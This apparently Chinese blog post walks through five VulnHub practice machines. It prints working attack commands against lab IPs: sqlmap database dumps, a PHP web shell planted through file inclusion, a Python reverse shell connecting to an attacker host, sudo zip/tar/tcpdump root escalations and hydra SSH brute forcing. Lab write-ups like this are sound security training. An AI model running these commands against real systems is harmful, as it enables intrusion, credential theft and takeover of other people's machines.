vulnhub 5

目录

 

pinkys-palace-v1,225

1.端口扫描

2.访问8080端口显示403,使用代理后尝试

3.ssh登录pinkymanage用户

4.提权

zico2-1,210

1.端口扫描

​2.查看web服务,存在本地文件包含漏洞

​3.利用phpliteadmin漏洞写入一句话

4.切换至zico账号进行提权

lord-of-the-root-101,129

1.端口扫描和端口碰撞

​2.查看1337端口

3.sqlmap爆破数据库

4.ssh登录

​5.提权

tr0ll-1,100

1.端口扫描

​2.利用ftp

​3.分析pcap包

4.下载分析文件

5.提权

web-developer-1,288

1.端口扫描

​2.目录爆破,访问ipdata

​3.wireshark分析analyze.cap

​4.ssh登录,提权获取flag


pinkys-palace-v1,225

1.端口扫描

vulnhub 5

2.访问8080端口显示403,使用代理后尝试

vulnhub 5

vulnhub 5

gobuster进行爆破

gobuster dir -p http://192.168.43.113:31337 -u http://127.0.0.1:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

vulnhub 5

vulnhub 5

sql注入

sqlmap -u http://127.0.0.1:8080/littlesecrets-main/login.php --level=3 --proxy http://192.168.43.113:31337 --data="user=admin&pass=admin" -D pinky_sec_db -T users -C uid,user,pass --dump-all --batch --threads 10

vulnhub 5

3.ssh登录pinkymanage用户

vulnhub 5

网站根目录存在pinky的密钥,保存后登录pinky账号

cat .ultrasecret | base64 -d

vulnhub 5

将密钥复制到本地

vulnhub 5

4.提权

vulnhub 5

 

zico2-1,210

1.端口扫描

vulnhub 5

2.查看web服务,存在本地文件包含漏洞

vulnhub 5

vulnhub 5

目录爆破

gobuster dir -u http://192.168.43.11 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

vulnhub 5

尝试登录phpLiteAdmin

vulnhub 5

3.利用phpliteadmin漏洞写入一句话

vulnhub 5

<?php echo system($_GET["cmd"]);?>    #写入一句话
http://192.168.43.11/view.php?page=../../../../../..//usr/databases/1.php&cmd=pwd

http://192.168.43.11/view.php?page=../../../../../..//usr/databases/1.php&cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.43.2",5522));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'    #反弹shell

vulnhub 5

vulnhub 5

vulnhub 5

vulnhub 5

vulnhub 5

查看wordpress配置文件

vulnhub 5

4.切换至zico账号进行提权

vulnhub 5

zip提权

touch /tmp/exploit
sudo -u root zip /tmp/exploit.zip /tmp/exploit -T --unzip-command="sh -c /bin/bash"

vulnhub 5

tar提权

sudo /bin/tar cf /dev/null /pwnd --checkpoint=1 --checkpoint-action=exec=/bin/bash

vulnhub 5

 

lord-of-the-root-101,129

1.端口扫描和端口碰撞

vulnhub 5

hping3 -S 192.168.43.170 -p 1 -c 1 
hping3 -S 192.168.43.170 -p 2 -c 1 
hping3 -S 192.168.43.170 -p 3 -c 1 

vulnhub 5

2.查看1337端口

vulnhub 5

robots页面有base64编码内容,进行解码

vulnhub 5

3.sqlmap爆破数据库

 sqlmap -o -u "http://192.168.43.170:1337/978345210/index.php" --forms -D Webapp -T Users -C id,username,password --dump --batch

vulnhub 5

4.ssh登录

vulnhub 5

vulnhub 5

5.提权

vulnhub 5

vulnhub 5

 

tr0ll-1,100

1.端口扫描

vulnhub 5

2.利用ftp

vulnhub 5

3.分析pcap包

vulnhub 5

vulnhub 5

4.下载分析文件

vulnhub 5

vulnhub 5

访问0x0856BF目录

vulnhub 5

hydra爆破ssh

hydra -L user.txt -p pass.txt 192.168.43.11 ssh

5.提权

vulnhub 5

vulnhub 5

vulnhub 5

 

web-developer-1,288

1.端口扫描

vulnhub 5

2.目录爆破,访问ipdata

vulnhub 5

vulnhub 5

3.wireshark分析analyze.cap

查看http协议中的post请求

vulnhub 5

4.ssh登录,提权获取flag

webdeveloper@webdeveloper:/tmp$ touch exploit
webdeveloper@webdeveloper:/tmp$ echo 'cat /root/flag.txt' > /tmp/exploit
webdeveloper@webdeveloper:/tmp$ chmod +x /tmp/exploit
webdeveloper@webdeveloper:/tmp$ 
webdeveloper@webdeveloper:/tmp$ sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root

vulnhub 5

 

 

 

上一篇:vulnhub靶机 | DriftingBlues:7


下一篇:VulnHub靶场篇8-IMF:1